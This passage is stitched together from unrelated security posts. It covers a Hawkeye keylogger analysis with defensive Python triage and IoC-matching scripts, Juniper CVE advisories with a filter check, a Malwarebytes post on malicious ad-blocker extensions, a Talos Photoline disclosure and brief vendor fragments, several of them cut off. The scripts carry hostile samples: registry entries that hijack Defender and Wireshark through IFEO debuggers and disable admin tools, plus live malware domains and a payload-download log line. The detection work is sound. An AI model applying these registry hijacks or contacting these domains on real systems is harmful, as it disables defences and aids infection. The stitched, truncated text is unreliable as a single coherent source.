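policy values that disable Task Manager, Regedit and the command prompt.

Added example, not Microsoft's tooling.  It reads a constructed registry
export (.reg text) and a constructed HOSTS file rather than a live system;
DisableTaskMgr, DisableRegistryTools and DisableCMD are the standard policy
value names, while the sample targets and domains are made up.
"""

IFEO_MARK = "\\image file execution options\\"
LOCKOUT_VALUES = {"disabletaskmgr", "disableregistrytools", "disablecmd"}
NULL_ROUTES = {"127.0.0.1", "0.0.0.0", "::1"}
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost",
               "ip6-loopback", "broadcasthost"}

# Constructed .reg export: two IFEO hijacks like the ones the malware writes,
# a benign GlobalFlag entry as a control, and the three lockout policies.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe]
"Debugger"="rundll32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"Debugger"="rundll32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000001
"""

# Constructed HOSTS file; av-vendor.example stands in for whatever update
# domains the attacker's config lists.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost
127.0.0.1       update.av-vendor.example        # pinned by the malware
0.0.0.0         definitions.av-vendor.example
10.0.0.5        intranet.corp.example
"""


def parse_reg_export(text: str) -> dict:
    """Minimal parser for 'Windows Registry Editor Version 5.00' exports:
    {key_path: {value_name: value}} with dwords as int and strings unquoted."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, val = line.partition("=")
            name = name.strip('"')
            keys[current][name] = int(val[6:], 16) if val.startswith("dword:") else val.strip('"')
    return keys


def ifeo_debugger_hijacks(keys: dict) -> list:
    """(target exe, debugger) for every IFEO subkey that redirects execution."""
    hits = []
    for path, values in keys.items():
        if IFEO_MARK not in path.lower():
            continue
        debugger = next((v for n, v in values.items() if n.lower() == "debugger"), None)
        if debugger is not None:
            hits.append((path.rsplit("\\", 1)[-1], debugger))
    return hits


def tool_lockouts(keys: dict) -> list:
    """(key path, value name) for policy values that disable admin tools."""
    return [(path, name) for path, values in keys.items()
            for name, v in values.items() if name.lower() in LOCKOUT_VALUES and v == 1]


def hosts_sinkholes(text: str) -> list:
    """(hostname, address) for entries pinning a non-local name to loopback or 0.0.0.0."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        if addr in NULL_ROUTES:
            hits.extend((n, addr) for n in names if n.lower() not in LOCAL_NAMES)
    return hits


def triage(reg_text: str, hosts_text: str) -> dict:
    keys = parse_reg_export(reg_text)
    return {"ifeo_hijacks": ifeo_debugger_hijacks(keys),
            "tool_lockouts": tool_lockouts(keys),
            "hosts_sinkholes": hosts_sinkholes(hosts_text)}


if __name__ == "__main__":
    for kind, findings in triage(SAMPLE_REG, SAMPLE_HOSTS).items():
        print(kind, findings)
```

Any Debugger value under Image File Execution Options is rare enough on a workstation to be worth an alert on its own; rundll32.exe as the debugger is the signature of this particular malware, but a different innocuous-looking binary would disable the target just as well, so the check keys on the value's presence rather than its content.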

Meanwhile, it prevents other malware from infecting the machine. It repeatedly scans and removes any new values to certain registry keys, stops associated processes, and deletes related files.

Hawkeye attempts to avoid automated analysis. The delay in execution is designed to defeat automated sandbox analysis that allots only a certain time for malware execution and analysis. It likewise attempts to evade manual analysis by monitoring windows and exiting when it finds the following analysis tools:

  • Sandboxie
  • Winsock Packet Editor Pro
  • Wireshark

Defending mailboxes, endpoints, and networks against persistent malware campaigns

Hawkeye illustrates the continuous evolution of malware in a threat landscape fueled by the cybercriminal underground. Malware services make malware accessible to even unsophisticated operators, while simultaneously making malware more durable with advanced techniques like in-memory unpacking and abuse of .NET's CLR engine for stealth. In this blog we covered the capabilities of its latest version, Hawkeye Keylogger – Reborn v8, highlighting some of the enhancements from the previous version. Given its history, the Hawkeye authors are likely to release a new version in the future.

Organizations should continue educating their employees about spotting and preventing social engineering attacks. After all, Hawkeye's complicated infection chain begins with a social engineering email and lure document. A security-aware workforce will go a long way in securing networks against attacks.

More importantly, securing mailboxes, endpoints, and networks using advanced threat protection technologies can prevent attacks like Hawkeye, other malware operations, and sophisticated cyberattacks.

Our in-depth analysis of the latest version and our insight into the cybercriminal operation that drives this development allow us to proactively build robust protections against both known and unknown threats.

Office 365 Advanced Threat Protection (Office 365 ATP) protects mailboxes as well as files, online storage, and applications from malware campaigns like Hawkeye. It uses a robust detonation platform, heuristics, and machine learning to inspect attachments and links for malicious content in real time, ensuring that emails that carry Hawkeye and other threats don't reach mailboxes and devices. Learn how to add Office 365 ATP to existing Exchange or Office 365 plans.

Windows Defender Antivirus (Windows Defender AV) provides an additional layer of protection by detecting malware delivered through email, as well as other infection vectors. Using local and cloud-based machine learning, Windows Defender AV's next-gen protection can block even new and unknown threats on Windows 10 and Windows 10 in S mode.

Additionally, endpoint detection and response (EDR) capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) expose sophisticated and evasive malicious behavior, such as the behavior Hawkeye exhibits. Sign up for a free Windows Defender ATP trial.

Windows Defender ATP's rich detection libraries are powered by machine learning and allow security operations teams to detect and respond to anomalous attacks in the network. For example, machine learning detection algorithms surface the following alert when Hawkeye uses a malicious PowerShell script to download the payload:

Figure 16: Windows Defender ATP alert for Hawkeye's malicious PowerShell component

Windows Defender ATP also has behavior-based machine learning algorithms that detect the payload itself:

Figure 17: Windows Defender ATP alert for Hawkeye's payload

These security technologies are part of the advanced threat protection solutions in Microsoft 365. Enhanced signal sharing across services in Windows, Office 365, and Enterprise Mobility + Security through the Microsoft Intelligent Security Graph enables the automatic update of protections and orchestration of remediation across Microsoft 365.

Office 365 ATP Research

Indicators of Compromise (IoCs)

Email subject lines

  • {EXT} NEW ORDER ENQUIRY #65563879884210#
  • B/L COPY FOR SHIPMENT
  • Betreff: URGENT ENQ FOR Equipment
  • RFQ-GHFD456 ADCO 5647 deadline 7th May

Attachment file names

  • Betreff URGENT ENQ FOR Equipment.doc
  • BILL OF LADING.doc
  • NEW ORDER ENQUIRY #65563879884210#.doc
  • Scan Copy 001.doc
  • Swift Copy.doc

Domains

  • lokipanelhostingpanel[.]gq
  • stellarball[.]com
  • stemtopx[.]com
  • stevemike-fireforce[.]info

Shortened redirector links

  • hxxp://bit[.]ly/ASD8239ASdmkWi38AS (was also used in a Remcos campaign)
  • hxxp://bit[.l]y/loadingpleaswaitrr
  • hxxp://bit[.l]y/Loadingwaitplez

Files (SHA-256)

  • d97f1248061353b15d460eb1a4740d0d61d3f2fcb41aa86ca6b1d0ff6990210a – .eml
  • 23475b23275e1722f545c4403e4aeddf528426fd242e1e5e17726adb67a494e6 – .eml
  • 02070ca81e0415a8df4b468a6f96298460e8b1ab157a8560dcc120b984ba723b – .eml
  • 79712cc97a19ae7e7e2a4b259e1a098a8dd4bb066d409631fb453b5203c1e9fe – .eml
  • 452cc04c8fc7197d50b2333ecc6111b07827051be75eb4380d9f1811fa94cbc2 – .eml
  • 95511672dce0bd95e882d7c851447f16a3488fd19c380c82a30927bac875672a – .eml
  • 1b778e81ee303688c32117c6663494616cec4db13d0dee7694031d77f0487f39 – .eml
  • 12e9b955d76fd0e769335da2487db2e273e9af55203af5421fc6220f3b1f695e – .eml
  • 12f138e5e511f9c75e14b76e0ee1f3c748e842dfb200ac1bfa43d81058a25a28 – .eml
  • 9dfbd57361c36d5e4bda9d442371fbaa6c32ae0e746ebaf59d4ec34d0c429221 – .docx (stage 1)
  • f1b58fd2bc8695effcabe8df9389eaa8c1f51cf4ec38737e4fbc777874b6e752 – .rtf (stage 2)
  • 5ad6cf87dd42622115f33b53523d0a659308abbbe3b48c7400cc51fd081bf4dd – .doc
  • 7db8d0ff64709d864102c7d29a3803a1099851642374a473e492a3bc2f2a7bae – .rtf
  • 01538c304e4ed77239fc4e31fb14c47604a768a7f9a2a0e7368693255b408420 – .rtf
  • d7ea3b7497f00eec39f8950a7f7cf7c340cf9bf0f8c404e9e677e7bf31ffe7be – .vbs
  • ccce59e6335c8cc6adf973406af1edb7dea5d8ded4a956984dff4ae587bcf0a8 – .exe (packed)
  • c73c58933a027725d42a38e92ad9fd3c9bbb1f8a23b3f97a0dd91e49c38a2a43 – .exe (unpacked)
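The indicators above are published defanged (hxxp, bracketed dots), so they have to be re-fanged before they can be matched against anything. The following added example, not Microsoft's tooling, does that and then runs the domains, redirector links, subject lines and file hashes from the list against proxy and mail log lines; the log lines, their field layout and the hash list are constructed for the demonstration and are not from any real environment.

```python
"""Match the Hawkeye indicators above against log lines and file hashes.

Added example, not Microsoft's tooling. The indicators are copied from the
list above as published (defanged). The proxy/mail log lines and their
formats, and the hash list, are constructed for this demonstration.
"""
import re

DOMAINS = [
    "lokipanelhostingpanel[.]gq",
    "stellarball[.]com",
    "stemtopx[.]com",
    "stevemike-fireforce[.]info",
]
URLS = [
    "hxxp://bit[.]ly/ASD8239ASdmkWi38AS",
    "hxxp://bit[.l]y/loadingpleaswaitrr",
    "hxxp://bit[.l]y/Loadingwaitplez",
]
SUBJECTS = [
    "{EXT} NEW ORDER ENQUIRY #65563879884210#",
    "B/L COPY FOR SHIPMENT",
    "Betreff: URGENT ENQ FOR Equipment",
    "RFQ-GHFD456 ADCO 5647 deadline 7th May",
]
HASHES = {  # SHA-256 -> label, from the list above
    "d7ea3b7497f00eec39f8950a7f7cf7c340cf9bf0f8c404e9e677e7bf31ffe7be": ".vbs",
    "ccce59e6335c8cc6adf973406af1edb7dea5d8ded4a956984dff4ae587bcf0a8": ".exe (packed)",
    "c73c58933a027725d42a38e92ad9fd3c9bbb1f8a23b3f97a0dd91e49c38a2a43": ".exe (unpacked)",
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its real form.

    hxxp:// becomes http://, and a bracketed dot becomes a dot. The list above
    writes some links as bit[.l]y; the bracket is read as wrapping the dot plus
    a letter that slipped inside it, which gives bit.ly.
    """
    ioc = re.sub(r"^hxxp(s?)://", r"http\1://", ioc, flags=re.IGNORECASE)
    return re.sub(r"\[\.([a-z]?)\]", r".\1", ioc)


def _normalize_subject(s: str) -> str:
    return " ".join(s.split()).casefold()


# Compiled once. Domains are anchored so that e.g. notstellarball.com does not
# match and are compared case-insensitively; URL paths keep their case because
# bit.ly paths are case-sensitive.
_DOMAIN_PATTERNS = [
    (d, re.compile(r"(?<![\w.-])" + re.escape(refang(d)) + r"(?![\w-])",
                   re.IGNORECASE))
    for d in DOMAINS
]
_URL_PATTERNS = [(u, re.compile(re.escape(refang(u)))) for u in URLS]
_SUBJECT_SET = {_normalize_subject(s): s for s in SUBJECTS}
_SUBJECT_FIELD = re.compile(r'subject="([^"]*)"')


def scan_lines(lines):
    """Return (line_number, kind, indicator) for every hit in the given lines."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for u, pat in _URL_PATTERNS:
            if pat.search(line):
                hits.append((n, "url", u))
        for d, pat in _DOMAIN_PATTERNS:
            if pat.search(line):
                hits.append((n, "domain", d))
        m = _SUBJECT_FIELD.search(line)
        if m and _normalize_subject(m.group(1)) in _SUBJECT_SET:
            hits.append((n, "subject", _SUBJECT_SET[_normalize_subject(m.group(1))]))
    return hits


def scan_hashes(digests):
    """Return (sha256, label) for every digest that appears in the list above."""
    return [(h.lower(), HASHES[h.lower()]) for h in digests if h.lower() in HASHES]


# Constructed sample data (not from any real environment).
SAMPLE_PROXY_LOG = [
    "2018-07-11T09:12:01Z 10.0.0.23 GET http://bit.ly/ASD8239ASdmkWi38AS 302",
    "2018-07-11T09:12:03Z 10.0.0.23 GET http://stemtopx.com/u/inv.exe 200",
    "2018-07-11T09:13:44Z 10.0.0.41 GET https://www.example.com/ 200",
    "2018-07-11T09:14:10Z 10.0.0.41 GET http://notstellarball.com/ 200",
]
SAMPLE_MAIL_LOG = [
    'from=<ops@example.net> subject="Weekly report" attach="report.xlsx"',
    'from=<sales@example.org> subject="B/L  COPY FOR SHIPMENT" attach="BILL OF LADING.doc"',
]
SAMPLE_HASHES = [
    "CCCE59E6335C8CC6ADF973406AF1EDB7DEA5D8DED4A956984DFF4AE587BCF0A8",
    "0000000000000000000000000000000000000000000000000000000000000000",
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_PROXY_LOG) + scan_lines(SAMPLE_MAIL_LOG):
        print("log hit:", hit)
    for hit in scan_hashes(SAMPLE_HASHES):
        print("hash hit:", hit)
```

The domain patterns use a lookbehind/lookahead rather than a plain substring test on purpose: a substring match would flag a host that merely ends in one of the listed names, and subject matching collapses whitespace and case because mail gateways do not always log the header byte-for-byte.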

*Updated 07/12/18 (removed statement that Hawkeye Keylogger is also known as iSpy Keylogger)

CVE-2018-0026

After Junos OS device reboot or upgrade, the stateless firewall filter configuration may not take effect. This issue can be verified by running the command:

  user@re0> show interfaces <interface_name> extensive | match filters
  CAM destination filters: 0, CAM source filters: 0

Note: when the issue occurs, it does not show the applied firewall filter. The correct output should show the applied firewall filter, for example:

  user@re0> show interfaces <interface_name> extensive | match filters
  CAM destination filters: 0, CAM source filters: 0
  Input Filters: FIREWAL_FILTER_NAME-<interface_name>

This issue affects firewall filters for every address family. Affected releases are Juniper Networks Junos OS: 15.1R4, 15.1R5, 15.1R6 and SRs based on these MRs. 15.1X8 versions prior to 15.1X8.3.
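Because the "CAM ... filters" counters appear in both the broken and the healthy output, a check for this issue has to look specifically for the "Input Filters:" line. The following added example (not Juniper tooling) parses captured output of the command above for a set of interfaces and reports every interface whose configured filter is absent; the sample captures are constructed from the advisory's two outputs, including its FIREWAL_FILTER_NAME spelling, and the interface name, the expected-filter mapping and the treatment of "Output Filters:" are this example's own assumptions.

```python
"""Check whether a configured stateless firewall filter is really applied.

Added example for CVE-2018-0026; not Juniper tooling. It parses the output of

    show interfaces <interface_name> extensive | match filters

in the form quoted in the advisory: the "CAM ... filters" counters appear
whether or not the filter is applied, so the decisive line is "Input Filters:"
(an "Output Filters:" line is assumed to have the same layout). The sample
captures are constructed from the advisory's two outputs.
"""
import re

_FILTER_LINE = re.compile(r"^\s*(Input|Output) Filters:\s*(\S+)", re.MULTILINE)


def applied_filters(output: str) -> dict:
    """Return {'input': [...], 'output': [...]} with the filter names listed."""
    found = {"input": [], "output": []}
    for direction, name in _FILTER_LINE.findall(output):
        found[direction.lower()].append(name)
    return found


def _matches(configured: str, shown: str) -> bool:
    # The advisory's healthy output shows the filter as NAME-<interface_name>,
    # so accept the bare name or the name followed by "-".
    return shown == configured or shown.startswith(configured + "-")


def check_interfaces(expected: dict, outputs: dict) -> list:
    """Report interfaces whose configured filter is missing from the output.

    expected: {interface: (direction, filter_name)} taken from the configuration
    outputs:  {interface: captured 'show interfaces ... | match filters' text}
    An interface with no captured output is reported as well.
    """
    problems = []
    for ifname, (direction, filter_name) in expected.items():
        shown = applied_filters(outputs.get(ifname, "")).get(direction, [])
        if not any(_matches(filter_name, s) for s in shown):
            problems.append(f"{ifname}: {direction} filter {filter_name} not applied")
    return problems


# Constructed captures modelled on the advisory's two outputs.
SAMPLE_MISSING = "CAM destination filters: 0, CAM source filters: 0\n"
SAMPLE_APPLIED = (
    "CAM destination filters: 0, CAM source filters: 0\n"
    "Input Filters: FIREWAL_FILTER_NAME-ge-0/0/0.0\n"
)
EXPECTED = {"ge-0/0/0.0": ("input", "FIREWAL_FILTER_NAME")}  # assumed config

if __name__ == "__main__":
    for label, capture in (("after reboot", SAMPLE_MISSING), ("healthy", SAMPLE_APPLIED)):
        print(label, check_interfaces(EXPECTED, {"ge-0/0/0.0": capture}) or "ok")
```

Run against captures taken right after a reboot or upgrade, the non-empty result is the list of interfaces that need the filter re-applied before traffic is trusted.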

CVE-2018-0030

Receipt of a specific MPLS packet may cause MPC7/8/9, PTX-FPC3 (FPC-P1, FPC-P2) line cards or PTX1K to crash and restart. By continuously sending specific MPLS packets, an attacker can repeatedly crash the line cards or PTX1K causing a sustained Denial of Service. Affected releases are Juniper Networks Junos OS with MPC7/8/9 or PTX-FPC3 (FPC-P1, FPC-P2) installed and PTX1K: 15.1F versions prior to 15.1F6-S10; 15.1 versions prior to 15.1R4-S9, 15.1R6-S6, 15.1R7; 16.1 versions prior to 16.1R3-S8, 16.1R4-S9, 16.1R5-S4, 16.1R6-S3, 16.1R7; 16.1X65 versions prior to 16.1X65-D46; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S7, 17.1R3; 17.2 versions prior to 17.2R1-S4, 17.2R2-S4, 17.2R3; 17.2X75 versions prior to 17.2X75-D70, 17.2X75-D90; 17.3 versions prior to 17.3R1-S4, 17.3R2, 17.4 versions prior to 17.4R1-S2, 17.4R2. Refer to KB25385 for more information about PFE line cards.

CVE-2018-0029

While experiencing a broadcast storm, placing the fxp0 interface into promiscuous mode via the 'monitor traffic interface fxp0' can cause the system to crash and restart (vmcore). This issue only affects Junos OS 15.1 and later releases, and affects both single core and multi-core REs. Releases prior to Junos OS 15.1 are unaffected by this vulnerability. Affected releases are Juniper Networks Junos OS: 15.1 versions prior to 15.1F6-S11, 15.1R4-S9, 15.1R6-S6, 15.1R7; 15.1X49 versions prior to 15.1X49-D140; 15.1X53 versions prior to 15.1X53-D59 on EX2300/EX3400; 15.1X53 versions prior to 15.1X53-D67 on QFX10K; 15.1X53 versions prior to 15.1X53-D233 on QFX5200/QFX5110; 15.1X53 versions prior to 15.1X53-D471, 15.1X53-D490 on NFX; 16.1 versions prior to 16.1R3-S8, 16.1R5-S4, 16.1R6-S1, 16.1R7; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S7, 17.1R3; 17.2 versions prior to 17.2R1-S6, 17.2R2-S4, 17.2R3; 17.2X75 versions prior to 17.2X75-D90, 17.2X75-D110; 17.3 versions prior to 17.3R1-S4, 17.3R2; 17.4 versions prior to 17.4R1-S3, 17.4R2.

CVE-2018-0041

Juniper Networks Contrail Service Orchestration releases prior to 3.3.0 use hardcoded credentials to access the Keystone service. These credentials allow network-based attackers unauthorized access to information stored in Keystone.

CVE-2018-0025

When an SRX Series device is configured to use HTTP/HTTPS pass-through authentication services, a client sending authentication credentials in the initial HTTP/HTTPS session is at risk that these credentials may be captured during follow-on HTTP/HTTPS requests by a malicious actor through a man-in-the-middle attack or by authentic servers subverted by malicious actors. FTP and Telnet pass-through authentication services are not affected. Affected releases are Juniper Networks SRX Series: 12.1X46 versions prior to 12.1X46-D67 on SRX Series; 12.3X48 versions prior to 12.3X48-D25 on SRX Series; 15.1X49 versions prior to 15.1X49-D35 on SRX Series.

CVE-2018-0040

Juniper Networks Contrail Service Orchestrator versions prior to 4.0.0 use hardcoded cryptographic certificates and keys in some cases, which may allow network based attackers to gain unauthorized access to services.

CVE-2018-0035

QFX5200 and QFX10002 devices that have been shipped with Junos OS 15.1X53-D21, 15.1X53-D30, 15.1X53-D31, 15.1X53-D32, 15.1X53-D33 and 15.1X53-D60 or have been upgraded to these releases using the .bin or .iso images may contain an unintended additional Open Network Install Environment (ONIE) partition. This additional partition allows the superuser to reboot to the ONIE partition which will wipe out the content of the Junos partition and its configuration. Once rebooted, the ONIE partition will not have root password configured, thus any user can access the console or SSH, using an IP address acquired from DHCP, as root without password. Once the device has been shipped or upgraded with the ONIE partition installed, the issue will persist. Simply upgrading to higher release via the CLI will not resolve the issue. No other Juniper Networks products or platforms are affected by this issue.

CVE-2018-0038

Juniper Networks Contrail Service Orchestration releases prior to 3.3.0 have the Cassandra service enabled by default with hardcoded credentials. These credentials allow network-based attackers unauthorized access to information stored in Cassandra.

CVE-2018-0027

Receipt of a crafted or malformed RSVP PATH message may cause the routing protocol daemon (RPD) to hang or crash. When RPD is unavailable, routing updates cannot be processed which can lead to an extended network outage. If RSVP is not enabled on an interface, then the issue cannot be triggered via that interface. This issue only affects Juniper Networks Junos OS 16.1 versions prior to 16.1R3. This issue does not affect Junos releases prior to 16.1R1.

CVE-2018-0024

An Improper Privilege Management vulnerability in a shell session of Juniper Networks Junos OS allows an authenticated unprivileged attacker to gain full control of the system. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D45 on SRX Series; 12.3X48 versions prior to 12.3X48-D20 on SRX Series; 12.3 versions prior to 12.3R11 on EX Series; 14.1X53 versions prior to 14.1X53-D30 on EX2200/VC, EX3200, EX3300/VC, EX4200, EX4300, EX4550/VC, EX4600, EX6200, EX8200/VC (XRE), QFX3500, QFX3600, QFX5100; 15.1X49 versions prior to 15.1X49-D20 on SRX Series.

CVE-2018-0034

A Denial of Service vulnerability exists in the Juniper Networks Junos OS JDHCPD daemon which allows an attacker to core the JDHCPD daemon by sending a crafted IPv6 packet to the system. This issue is limited to systems which receive IPv6 DHCP packets on a system configured for DHCP processing using the JDHCPD daemon. This issue does not affect IPv4 DHCP packet processing. Affected releases are Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S10 on EX Series; 12.3X48 versions prior to 12.3X48-D70 on SRX Series; 14.1X53 versions prior to 14.1X53-D47 on EX2200/VC, EX3200, EX3300/VC, EX4200, EX4300, EX4550/VC, EX4600, EX6200, EX8200/VC (XRE), QFX3500, QFX3600, QFX5100; 14.1X53 versions prior to 14.1X53-D130 on QFabric; 15.1 versions prior to 15.1R4-S9, 15.1R6-S6, 15.1R7; 15.1X49 versions prior to 15.1X49-D140 on SRX Series; 15.1X53 versions prior to 15.1X53-D67 on QFX10000 Series; 15.1X53 versions prior to 15.1X53-D233 on QFX5110, QFX5200; 15.1X53 versions prior to 15.1X53-D471 on NFX 150, NFX 250; 16.1 versions prior to 16.1R3-S9, 16.1R4-S8, 16.1R5-S4, 16.1R6-S3, 16.1R7; 16.2 versions prior to 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S7, 17.1R3; 17.2 versions prior to 17.2R1-S6, 17.2R2-S4, 17.2R3; 17.3 versions prior to 17.3R1-S4, 17.3R2-S2, 17.3R3; 17.4 versions prior to 17.4R1-S3, 17.4R2.

CVE-2018-0039

Juniper Networks Contrail Service Orchestration releases prior to 4.0.0 have the Grafana service enabled by default with hardcoded credentials. These credentials allow network-based attackers unauthorized access to information stored in Grafana, or to exploit other weaknesses or vulnerabilities in Grafana.

CVE-2018-0032

The receipt of a crafted BGP UPDATE can lead to a routing process daemon (RPD) crash and restart. Repeated receipt of the same crafted BGP UPDATE can result in an extended denial of service condition for the device. This issue only affects the specific versions of Junos OS listed within this advisory. Earlier releases are unaffected by this vulnerability. This crafted BGP UPDATE does not propagate to other BGP peers. Affected releases are Juniper Networks Junos OS: 16.1X65 versions prior to 16.1X65-D47; 17.2X75 versions prior to 17.2X75-D91, 17.2X75-D110; 17.3 versions prior to 17.3R1-S4, 17.3R2; 17.4 versions prior to 17.4R1-S3, 17.4R2.

CVE-2018-0031

Receipt of specially crafted UDP/IP packets over MPLS may be able to bypass a stateless firewall filter. The crafted UDP packets must be encapsulated and meet a very specific packet format to be classified in a way that bypasses IP firewall filter rules. The packets themselves do not cause a service interruption (e.g. RPD crash), but receipt of a high rate of UDP packets may be able to contribute to a denial of service attack. This issue only affects processing of transit UDP/IP packets over MPLS, received on an interface with MPLS enabled. TCP packet processing and non-MPLS encapsulated UDP packet processing are unaffected by this issue. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D76; 12.3 versions prior to 12.3R12-S10; 12.3X48 versions prior to 12.3X48-D66, 12.3X48-D70; 14.1X53 versions prior to 14.1X53-D47; 15.1 versions prior to 15.1F6-S10, 15.1R4-S9, 15.1R6-S6, 15.1R7; 15.1X49 versions prior to 15.1X49-D131, 15.1X49-D140; 15.1X53 versions prior to 15.1X53-D59 on EX2300/EX3400; 15.1X53 versions prior to 15.1X53-D67 on QFX10K; 15.1X53 versions prior to 15.1X53-D233 on QFX5200/QFX5110; 15.1X53 versions prior to 15.1X53-D471, 15.1X53-D490 on NFX; 16.1 versions prior to 16.1R3-S8, 16.1R4-S9, 16.1R5-S4, 16.1R6-S3, 16.1R7; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S7, 17.1R3; 17.2 versions prior to 17.2R1-S6, 17.2R2-S4, 17.2R3; 17.2X75 versions prior to 17.2X75-D100; 17.3 versions prior to 17.3R1-S4, 17.3R2-S2, 17.3R3; 17.4 versions prior to 17.4R1-S3, 17.4R2; 18.1 versions prior to 18.1R2; 18.2X75 versions prior to 18.2X75-D5.

CVE-2018-0037

Junos OS routing protocol daemon (RPD) process may crash and restart or may lead to remote code execution while processing specific BGP NOTIFICATION messages. By continuously sending crafted BGP NOTIFICATION messages, an attacker can repeatedly crash the RPD process causing a sustained Denial of Service. Due to design improvements, this issue does not affect Junos OS 16.1R1, and all subsequent releases. This issue only affects the receiving BGP device and is non-transitive in nature. Affected releases are Juniper Networks Junos OS: 15.1F5 versions starting from 15.1F5-S7 and all subsequent releases; 15.1F6 versions starting from 15.1F6-S3 and later releases prior to 15.1F6-S10; 15.1F7 versions 15.1 versions starting from 15.1R5 and later releases, including the Service Releases based on 15.1R5 and on 15.1R6 prior to 15.1R6-S6 and 15.1R7;

We block shady ad blockers

Some of you have reached out to us concerning Malwarebytes' blocking of certain ad blocking extensions, or an influx in web blocking notifications. First things first, this is not a false positive. AdGuard recently reported on its blog that it had discovered numerous malicious ad blocking extensions in the Google Chrome store. According to an article by ZDNet, the malicious extensions have since been removed from the store. However, 20 million devices are estimated to have downloaded these extensions while they were still online. You might own one of those devices.

The extensions essentially turn the browser into a zombie under the control of a remote attacker, adding your device to a botnet. Since we are limited in our ability to remove extensions completely, we are blocking the domains the malicious extensions reach out to, so at the very least, users will not have their systems controlled by a cybercriminal.

If you are consistently getting pop-ups, you may want to check whether you are running one of the malicious extensions we are talking about here. Here is the full list:

  • uBlock Plus
  • Adblock Pro
  • HD for YouTube™
  • Webutation

If so, your best option is to remove it from your browser.

Check out our guide on Adware, that includes a section on extension removal.

Take a look at the names of some of these “extensions.” Notice anything? Adblock Pro, uBlock, YouTube: all big names and buzzwords that make these extensions seem more legitimate. Add in the fact that fake comments and reviews are created all the time for these types of tools and, at the end of the day, the criminal is counting on you not realizing that this is not the app you are looking for.

Please be mindful of what you install in your browser and, overall, on your computer. Think of those cheap DVDs you might find at the shop, whose titles are so similar to a big blockbuster film that folks who aren’t familiar with the source material overlook the fact that they are buying a knock-off. Treat extensions, plugins, and add-ons for your browsers the same way. There are some really great ones out there, but there are a lot of shady copycats.

Be sure to check user reviews, download numbers, and even outside recommendations (searching for “best ad blocker” might be a good place to start). Doing so will help make sure you’ve installed the right tool that will do the best job.

Thanks for reading, safe surfing, see you next time!

The post We block shady ad blockers appeared first on Malwarebytes Labs.

Vulnerability Spotlight: Computerinsel Photoline Multiple Vulnerabilities

Vulnerabilities discovered by Tyler Bohan from Talos

Overview

Today, Cisco Talos is disclosing several vulnerabilities in Computerinsel Photoline. Photoline is an image-processing tool used to modify and edit images, as well as other graphic-related material. This product has a sizable user base and is popular in the graphic design field. The vulnerabilities are present in the parsing functionality of the software.

TALOS-2018-0585 - Computerinsel Photoline PSD-Blending Channel Code Execution Vulnerability (CVE-2018-3921)

A memory corruption vulnerability exists in the Adobe Photoshop (PSD) file-parsing functionality of Computerinsel Photoline 20.54. A specially crafted PSD document processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PSD document to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0586 - Computerinsel Photoline ANI-Parsing Code Execution Vulnerability (CVE-2018-3922)

A memory corruption vulnerability exists in the ANI-parsing functionality of Computerinsel Photoline 20.54. A specially crafted ANI image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver an ANI image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0587 - Computerinsel Photoline PCX Run Length Encoding Code Execution Vulnerability (CVE-2018-3923)

A memory corruption vulnerability exists in the PCX-parsing functionality of Computerinsel Photoline 20.54. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

Tested Versions:

Computerinsel Photoline 20.54 for OS X

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 46452-46453, 46455-46456, 46459-46460

Breaking ground: Understanding and identifying hidden tunnels

It’s me again – Cognito. As always, I’ve been hard at work with Vectra to automate cyberattack detection and threat hunting. Recently, we made an alarming discovery: hackers are using hidden tunnels to break into and steal from financial services firms!

Clearly, this is serious business if it involves bad guys targeting massive amounts of money and private information. But what exactly are we dealing with? Let’s dig into what hidden tunnels are and how I find them to uncover the answer.

Data Transparency

Digital Guardian enables you to determine where confidential data is located, how data flows within the company, and the situations in which data is exposed to risk, all before formal policies are created.

Ask Sucuri: How Do You Find Website Backdoors?

In a previous post, we have explained what website backdoors are and what they look like. Today, we want to focus on ways that we identify and remove backdoors to prevent reinfection.

